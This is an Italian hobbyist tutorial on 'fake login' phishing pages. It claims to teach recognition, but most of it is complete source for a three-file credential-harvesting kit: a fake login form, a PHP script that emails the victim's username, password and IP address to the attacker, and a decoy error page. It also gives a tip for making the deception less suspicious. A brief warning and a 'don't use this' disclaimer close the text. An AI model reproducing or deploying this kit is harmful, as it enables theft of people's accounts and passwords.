Salve gente, oggi Shutdown vi dice che per essere
fregati basta davvero poco...

Infatti, questa guida possiede due facce, come una medaglia: da una vi insegnerò ( bhe, io ci tento :) ) a riconoscere i Fake Login e dall'altra a capirne il loro funzionamento.

Il Fake Login non è altro che una pagina di accesso, falsa, che vi viene presentata per rubarvi il vostro account e la vostra password. Un Fake Login potrebbe essere per esempio una copia fedele al sito della posta hotmail (http://www.msn.it - questo è quello vero!!).

Una copia fedele, uguale in tutto e per tutto, solo che al momento del nostro login, i nostri dati (account & pwd) verranno salvati in un database, in un file o magari inviati per posta
all'indirizzo del nostro scippatore di password.

Perchè c'è gente che vuole rubare le password
degli altri? bhe le motivazioni sono abbastanza semplici: avere accesso ad aree riservate ed
acquistare più "poteri" in rete, o più semplicemente farsi i caxxi ( ops, scusate :)) ) degli altri!!!.

Uno stupido fake login potrebbe essere formato da due file o tre files, magari, perfino da una
sola pagina.

Noi prenderemo in esame il caso dei 3 files:
pagina di accesso (login.html), pagina che spedisce i dati all'email
dell'aggressore(send.php) e la pagina di errore
che viene presentata dopo l'invio dei dati.

login.html
-------------------------------------------

<!-- QUESTO E' IL FORM DI ACCESSO, FALSO NATURALMENTE!! -->
<HTML>    
<HEAD>    
    <TITLE>Accedi</TITLE>
    <SCRIPT LANGUAGE="JavaScript"> function A() { document.a.Account.focus(); } </SCRIPT>
    <STYLE TYPE="TEXT/CSS">
    Td, Input { Font-Family: Verdana, Tahoma, Arial; Font-Size: 10 }
    Td { Color: #003500; }
    </STYLE>
</HEAD>    
<BODY TopMargin="0" LeftMargin="0" onLoad="A()">
    <TABLE Width="100%" Height="100%" CellPadding="0" CellSpacing="0" Border="0">
      <TD Align="Center">
         <TABLE CellPadding="8" CellSpacing="0" Border="0" BgColor="#EEEEEE">
            <TD><BR>
              <FORM Name="a" Action="send.php" Method="Post">
              Account email:<BR>
              <INPUT Type="text" Name="Account" Size="30" Style="Color: #0044FF"><BR><BR>
              Password:<BR>
              <INPUT Type="password" Name="Password" Size="25" Style="Color: #0044FF; Font-Size: 11"><BR><BR>
              <CENTER><INPUT Type="submit" Value="Send" OnClick="B()"> <INPUT Type="reset" Value="Reset"></CENTER>
              </FORM>
            </TD>
         </TABLE>
       </TD>
    </TABLE>
</BODY>    
</HTML>    



send.php
-------------------------------------------

<?PHP

# l'email a cui verranno inviati i dati appena rubati ..
$youremail = "emailaggressore@sito.com";


# alcuni dati del malcapitato ..
$ip = getenv('REMOTEADDR');
$td = date("F jS");
$date = date("d M, Y");
$time = date("g:i a");
$LogTime = trim(" Data: ".$date."\nOra: ".$time);


# l'oggetto del messaggio ..
$subject = "Code Sniffer";


# la funzione predefinita di PHP per spedire una e-mail ..
mail($youremail,$subject,"Username: ".$Account."\nPassword: ".$Password."\n\nIndirizzo ip: ".$ip."\n".$LogTime,"from: $Account <$Account>");


# a fine spedizione viene presentata una pagina
# di errore al nostro malcapitato
header("Location: login_error.html");

?>


login_error.html
-------------------------------------------

<!-- Una falsa pagina di errore -->
<HTML>    
<HEAD>    
    <TITLE>Autorizzazione fallita</TITLE>
    <STYLE TYPE="TEXT/CSS">
    Td { Font-Family: Verdana, Tahoma, Arial; Font-Size: 10 }
    </STYLE>
</HEAD>    
<BODY TopMargin="0" LeftMargin="0">
    <TABLE Width="100%" Height="100%" CellPadding="0" CellSpacing="0" Border="0">
      <TD Align="Center">
        <H1>Il server è in manutenzione...<BR>
        Provare un altro giorno..</H1>
       </TD>
    </TABLE>
</BODY>    
</HTML>    


Ecco qua, questo è un esempio di Fake Login...
Un esempio che desterebbe meno sospetti sarebbe
quello di reindirizzare l'utente, tramite il
file send.php, ad una pagina di accesso fallito
del sito cui noi stiamo imitando.

Quindi per concludere, non accettate mai
indirizzi di accesso che non conoscete, e
ricordate che il mio è solo un banalissimo
esempio... esistono siti veramente identici a
quelli originali, quindi fate sempre attenzione
dove vi andate a loggare...

Mi raccomando non usate i sorgenti postati di sopra per rubare le password degli altri,
altrimenti sarete solamenti dei lamer: perdenti!!

Occhio ragazzi e state attenti, molto attenti!!

----------------------------------------------------------
Author: Niccolò (Shutdown)
E-mail: shut-down@hotmail.it
site: http://www.shut-down.tk

Il mio sito è in rifacimento... sto creando un portale in PHP, non badate molto ai pochi contenuti!! ;)

Ciauz e alla prossima ...